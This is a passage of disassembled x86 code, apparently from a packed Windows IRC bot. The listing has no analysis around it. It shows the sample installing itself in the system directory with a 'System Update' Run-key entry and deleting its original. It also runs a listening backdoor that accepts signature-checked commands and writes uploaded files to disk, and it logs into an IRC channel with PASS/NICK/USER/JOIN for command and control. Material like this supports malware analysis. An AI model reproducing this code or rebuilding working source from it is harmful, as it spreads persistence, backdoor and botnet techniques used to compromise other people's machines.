mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315025E8
push ebx
push edi
push esi
call sub_315023AF
lea eax, [ebp+var_138]
push eax
call sub_31502490
add esp, 10h
loc_315025E8: ; CODE XREF: sub_31502548+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_315025B1
pop edi
pop esi
pop ebx
leave
retn
sub_31502548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025F6 proc near ; CODE XREF: sub_315026C2+D1�p
; sub_315026C2+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3150260B
push [ebp+arg_0]
call dword_31501094 ; DeleteFileA
loc_3150260B: ; CODE XREF: sub_315025F6+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068 ; GetSystemDirectoryA
test eax, eax
jz locret_315026C0
push esi
call dword_31501124 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31505CF0 ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_315010A0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3150243D
add esp, 14h
push ds:dword_31506164
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074 ; WinExec
push 1F4h
call dword_315010A4 ; Sleep
push 0
call dword_3150109C ; ExitProcess
pop esi
locret_315026C0: ; CODE XREF: sub_315025F6+23�j
leave
retn
sub_315025F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315026C2 proc near ; CODE XREF: UPX0:31501D64�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060 ; GetModuleFileNameA
test eax, eax
jz loc_315027FB
and ds:dword_315061A0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_31502748
call dword_31501124 ; rand
push 0Ah
mov ebx, offset aDfashnzdsdl ; "dfashnzdsdl"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31501932
pop ecx
pop ecx
push ebx
call dword_315010A0 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_3150243D
add esp, 14h
jmp short loc_31502757
; ---------------------------------------------------------------------------
loc_31502748: ; CODE XREF: sub_315026C2+4D�j
lea eax, [ebp+var_20]
push eax
push offset aDfashnzdsdl ; "dfashnzdsdl"
call dword_31501088 ; lstrcpyA
loc_31502757: ; CODE XREF: sub_315026C2+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_3150279D
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_3150243D
lea eax, [ebp+var_84]
push eax
push 0
call sub_315025F6
add esp, 1Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_3150279D: ; CODE XREF: sub_315026C2+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31501064 ; lstrcmpiA
test eax, eax
jnz short loc_315027E6
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315027FB
push ebx
push edi
push esi
mov ds:dword_315061A0, 1
call sub_315023AF
add esp, 0Ch
jmp short loc_315027FB
; ---------------------------------------------------------------------------
loc_315027E6: ; CODE XREF: sub_315026C2+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_315025F6
pop ecx
pop ecx
loc_315027FB: ; CODE XREF: sub_315026C2+1F�j
; sub_315026C2+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_315026C2 endp
; =============== S U B R O U T I N E =======================================
sub_31502800 proc near ; CODE XREF: sub_31501BA8+7A�p
; sub_315028AE+2A�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3150105C ; VirtualAlloc
retn
sub_31502800 endp
; =============== S U B R O U T I N E =======================================
sub_31502814 proc near ; CODE XREF: sub_315028AE+EB�p
; sub_31502B4C+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31501058 ; VirtualFree
retn
sub_31502814 endp
; =============== S U B R O U T I N E =======================================
sub_31502826 proc near ; CODE XREF: sub_31502B4C+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31501088 ; lstrcpyA
mov eax, esi
pop esi
retn
sub_31502826 endp
; =============== S U B R O U T I N E =======================================
sub_3150283F proc near ; CODE XREF: sub_31502B4C+3A�p
push ebx
push ebp
mov ebx, dword_31501018
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+0Eh]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_3150286E
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_3150286E
push 1
pop eax
jmp short loc_3150288E
; ---------------------------------------------------------------------------
loc_3150286E: ; CODE XREF: sub_3150283F+1B�j
; sub_3150283F+28�j
add edi, 12h
push edi
push ebp
push ebp
push 114h
push offset dword_31505CF8
push dword ptr [esi]
call dword_3150101C ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3150288E: ; CODE XREF: sub_3150283F+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_3150283F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31502893 proc near ; CODE XREF: sub_31502B4C+7E�p
push esi
mov esi, ecx
push dword ptr [esi+12h]
call dword_31501010 ; CryptDestroyKey
push 0
push dword ptr [esi+0Eh]
call dword_31501014 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_31502893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315028AE proc near ; CODE XREF: sub_31502B4C+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_31501050 ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31501054 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31502800
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_315011A0 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_31503A44 ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_3150298F
jl short loc_3150291C
cmp ecx, 61C46800h
ja short loc_3150298F
loc_3150291C: ; CODE XREF: sub_315028AE+64�j
cmp eax, 0FFFFFFF7h
jl short loc_3150298F
jg short loc_3150292B
cmp ecx, 9E3B9800h
jb short loc_3150298F
loc_3150292B: ; CODE XREF: sub_315028AE+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+0Eh]
call dword_31501000 ; CryptCreateHash
test eax, eax
jz short loc_31502980
push 0
push 8
push esi
push [ebp+var_4]
call dword_31501004 ; CryptHashData
test eax, eax
jz short loc_31502980
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_31502980
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+12h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31501008 ; CryptVerifySignatureA
test eax, eax
jnz short loc_315029A8
loc_31502980: ; CODE XREF: sub_315028AE+98�j
; sub_315028AE+AA�j ...
call dword_31501098 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
loc_3150298F: ; CODE XREF: sub_315028AE+62�j
; sub_315028AE+6C�j ...
call dword_31501098 ; RtlGetLastWin32Error
push 2
pop esi
loc_31502998: ; CODE XREF: sub_315028AE+117�j
push edi
call sub_31502814
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_315029A8: ; CODE XREF: sub_315028AE+D0�j
push [ebp+var_4]
call dword_3150100C ; CryptDestroyHash
call dword_31501124 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_3150119C ; send
jmp short loc_31502998
sub_315028AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315029C7 proc near ; CODE XREF: sub_31502B4C+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_315029E6
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_31502B3E
; ---------------------------------------------------------------------------
loc_315029E6: ; CODE XREF: sub_315029C7+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31502AF7
lea eax, [ebp+var_220]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_31501048 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_315010A8 ; lstrcpynA
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_315010F0 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_31502AE5
mov ebx, dword_3150119C
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31502A8D
inc [ebp+arg_4]
loc_31502A8D: ; CODE XREF: sub_315029C7+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31502ADA
loc_31502A97: ; CODE XREF: sub_315029C7+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31502ADA
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_3150104C ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31502A97
loc_31502ADA: ; CODE XREF: sub_315029C7+CE�j
; sub_315029C7+E5�j
push [ebp+var_C]
call dword_315010BC ; CloseHandle
jmp short loc_31502B47
; ---------------------------------------------------------------------------
loc_31502AE5: ; CODE XREF: sub_315029C7+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502AF7: ; CODE XREF: sub_315029C7+31�j
cmp [ebp+arg_4], 1
jnz short loc_31502B26
lea eax, [ebp+var_118]
push ebx
push eax
call dword_31501068 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_31501048 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B26: ; CODE XREF: sub_315029C7+134�j
cmp [ebp+arg_4], 3
jnz short loc_31502B47
push dword ptr [edi]
add edi, 4
push edi
call sub_31501962
pop ecx
pop ecx
push 0
push 4
push esi
loc_31502B3E: ; CODE XREF: sub_315029C7+1A�j
push [ebp+arg_0]
call dword_3150119C ; send
loc_31502B47: ; CODE XREF: sub_315029C7+11C�j
; sub_315029C7+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_315029C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502B4C proc near ; DATA XREF: sub_31502BE8+AA�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_315018BA
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_30]
rep movsd
push [ebp+var_1C]
call dword_315010D8 ; SetEvent
mov esi, 10000h
push esi
call sub_31502800
pop ecx
mov edi, eax
lea ecx, [ebp+var_18]
call sub_31502826
lea ecx, [ebp+var_18]
call sub_3150283F
lea eax, [ebp+var_30]
lea ecx, [ebp+var_18]
push eax
call sub_315028AE
test eax, eax
jnz short loc_31502BC0
loc_31502B9B: ; CODE XREF: sub_31502B4C+72�j
push 0
push esi
push edi
push [ebp+var_30]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_31502BC0
test eax, eax
jz short loc_31502BC0
push eax
push edi
push [ebp+var_30]
call sub_315029C7
add esp, 0Ch
jmp short loc_31502B9B
; ---------------------------------------------------------------------------
loc_31502BC0: ; CODE XREF: sub_31502B4C+4D�j
; sub_31502B4C+5F�j ...
push edi
call sub_31502814
pop ecx
lea ecx, [ebp+var_18]
call sub_31502893
push [ebp+var_30]
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_31502B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31502BE8 proc near ; DATA XREF: sub_31501D96+156�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_3150118C ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31503A38 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31502C19: ; CODE XREF: sub_31502BE8+59�j
lea eax, [esi+0BFBh]
push eax
call dword_31501194 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31501170 ; bind
test eax, eax
jz short loc_31502C43
inc esi
cmp esi, 0Ah
jl short loc_31502C19
loc_31502C43: ; CODE XREF: sub_31502BE8+53�j
push 32h
push [ebp+var_4]
call dword_31501174 ; listen
mov ebx, dword_315010BC
loc_31502C54: ; CODE XREF: sub_31502BE8+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31501178 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_3150108C ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_31502B4C
push esi
push esi
call dword_315010D0 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_31501090 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_31502C54
sub_31502BE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502CB7 proc near ; CODE XREF: sub_31502D3C+25�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31502CEA
add ebx, 1Ah
loc_31502CEA: ; CODE XREF: sub_31502CB7+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31501110
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D14
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D14: ; CODE XREF: sub_31502CB7+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31502D34
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31502D37
; ---------------------------------------------------------------------------
loc_31502D34: ; CODE XREF: sub_31502CB7+68�j
mov al, [ebp+arg_0]
loc_31502D37: ; CODE XREF: sub_31502CB7+5B�j
; sub_31502CB7+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31502CB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502D3C proc near ; CODE XREF: sub_31503722+F7�p
; sub_31503722+137�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_31502D97
mov edi, [ebp+arg_0]
push ebx
loc_31502D51: ; CODE XREF: sub_31502D3C+56�j
mov bl, al
inc [ebp+arg_4]
mov eax, esi
mov byte ptr [ebp+arg_0], bl
neg eax
push eax
push [ebp+arg_0]
call sub_31502CB7
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_31502D7B
cmp bl, 7Ah
jg short loc_31502D7B
movsx esi, bl
sub esi, 61h
loc_31502D7B: ; CODE XREF: sub_31502D3C+32�j
; sub_31502D3C+37�j
cmp bl, 41h
jl short loc_31502D8B
cmp bl, 5Ah
jg short loc_31502D8B
movsx esi, bl
sub esi, 41h
loc_31502D8B: ; CODE XREF: sub_31502D3C+42�j
; sub_31502D3C+47�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_31502D51
pop ebx
jmp short loc_31502D9A
; ---------------------------------------------------------------------------
loc_31502D97: ; CODE XREF: sub_31502D3C+F�j
mov edi, [ebp+arg_0]
loc_31502D9A: ; CODE XREF: sub_31502D3C+59�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_31502D3C endp
; =============== S U B R O U T I N E =======================================
sub_31502DA1 proc near ; CODE XREF: UPX0:3150346E�p
push esi
mov esi, ecx
push 20001h
call sub_31502800
mov [esi+2Ch], eax
pop ecx
mov eax, esi
pop esi
retn
sub_31502DA1 endp
; =============== S U B R O U T I N E =======================================
sub_31502DB6 proc near ; CODE XREF: UPX0:315034CE�p
; UPX0:31503521�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push 27h
push [esp+8+arg_0]
lea eax, [esi+4]
push eax
call dword_315010A8 ; lstrcpynA
mov eax, [esp+4+arg_4]
mov [esi+58h], eax
pop esi
retn 8
sub_31502DB6 endp
; ---------------------------------------------------------------------------
loc_31502DD4: ; CODE XREF: UPX0:31503AD6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_31502814
push dword ptr [esi+2Ch]
call sub_31502814
pop ecx
pop ecx
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_31502DEC proc near ; CODE XREF: UPX0:315034EC�p
; UPX0:3150353F�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
push ebx
push 1
mov esi, ecx
push 2
call dword_3150118C ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_315019B8
mov [esi+64h], eax
mov ax, [esi+58h]
pop ecx
lea edi, [esi+60h]
push eax
mov word ptr [edi], 2
call dword_31501194 ; ntohs
push 10h
push edi
push dword ptr [esi+5Ch]
mov [esi+62h], ax
call dword_31501198 ; connect
test eax, eax
jnz loc_31502FF1
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
and [ecx+eax], bl
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
lea eax, [esp+148h+var_138]
push 9
push eax
call sub_31501932
mov ebp, dword_3150113C
lea eax, [esp+150h+var_138]
push eax
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov edi, dword_315010A4
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push ebx
mov ebx, dword_315010A0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push [esp+148h+arg_0]
lea eax, [esp+14Ch+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_31502FF1
mov ecx, [esi+2Ch]
push 64h
and byte ptr [ecx+eax], 0
call edi ; Sleep
loc_31502F15: ; CODE XREF: sub_31502DEC+1AD�j
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
push offset aAlready ; "already"
push dword ptr [esi+2Ch]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31502F9E
push [esp+148h+arg_4]
push [esp+14Ch+arg_0]
call sub_31501932
push [esp+150h+arg_0]
lea eax, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push eax
call ebp ; wsprintfA
add esp, 14h
push 64h
call edi ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_31502FF1
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
jmp loc_31502F15
; ---------------------------------------------------------------------------
loc_31502F9E: ; CODE XREF: sub_31502DEC+145�j
push [esp+148h+arg_8]
lea eax, [esp+14Ch+var_12C]
push [esp+14Ch+arg_0]
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call edi ; Sleep
xor edi, edi
lea eax, [esp+148h+var_12C]
push edi
push eax
call ebx ; lstrlenA
push eax
lea eax, [esp+14Ch+var_128]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push edi
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_31502FFF
loc_31502FF1: ; CODE XREF: sub_31502DEC+4E�j
; sub_31502DEC+6B�j ...
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
push 1
pop eax
jmp short loc_31503021
; ---------------------------------------------------------------------------
loc_31502FFF: ; CODE XREF: sub_31502DEC+203�j
mov ecx, [esi+2Ch]
and byte ptr [ecx+eax], 0
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov [esi+284h], edi
mov [esi+7Ch], edi
mov [esi+70h], edi
mov [esi+74h], edi
xor eax, eax
loc_31503021: ; CODE XREF: sub_31502DEC+211�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 138h
retn 0Ch
sub_31502DEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150302E proc near ; CODE XREF: sub_31502DEC+7C�p
; sub_31502DEC+12E�p ...
var_190 = byte ptr -190h
var_64 = byte ptr -64h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
push [ebp+arg_0]
mov ebx, ecx
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_315030A8
mov esi, dword_315010A0
lea edi, [eax+4]
push edi
call esi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_31503067
push 1
pop eax
jmp short loc_315030AA
; ---------------------------------------------------------------------------
loc_31503067: ; CODE XREF: sub_3150302E+32�j
push eax
lea eax, [ebp+var_64]
push edi
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_64]
push eax
lea eax, [ebp+var_190]
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_190]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_190]
push eax
push dword ptr [ebx+5Ch]
call dword_3150119C ; send
loc_315030A8: ; CODE XREF: sub_3150302E+20�j
xor eax, eax
loc_315030AA: ; CODE XREF: sub_3150302E+37�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3150302E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315030B1 proc near ; CODE XREF: UPX0:3150358D�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 12Ch
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12C]
mov esi, ecx
push offset aJoinS ; "JOIN %s\r\n"
push eax
call dword_3150113C ; wsprintfA
mov edi, dword_315010A4
add esp, 0Ch
push 64h
call edi ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push 64h
call edi ; Sleep
push 0
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
and byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_3150317A
test eax, eax
jz short loc_3150317A
push 64h
call edi ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_3150302E
mov edi, dword_31501120
push offset a451 ; "451"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503153
push 3
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503153: ; CODE XREF: sub_315030B1+9C�j
push offset aPing ; "PING"
push dword ptr [esi+2Ch]
call edi ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503167
push 4
jmp short loc_3150317C
; ---------------------------------------------------------------------------
loc_31503167: ; CODE XREF: sub_315030B1+B0�j
push 23h
add esi, 30h
push [ebp+arg_0]
push esi
call dword_315010A8 ; lstrcpynA
xor eax, eax
jmp short loc_3150317D
; ---------------------------------------------------------------------------
loc_3150317A: ; CODE XREF: sub_315030B1+74�j
; sub_315030B1+78�j
push 2
loc_3150317C: ; CODE XREF: sub_315030B1+A0�j
; sub_315030B1+B4�j
pop eax
loc_3150317D: ; CODE XREF: sub_315030B1+C7�j
pop edi
pop esi
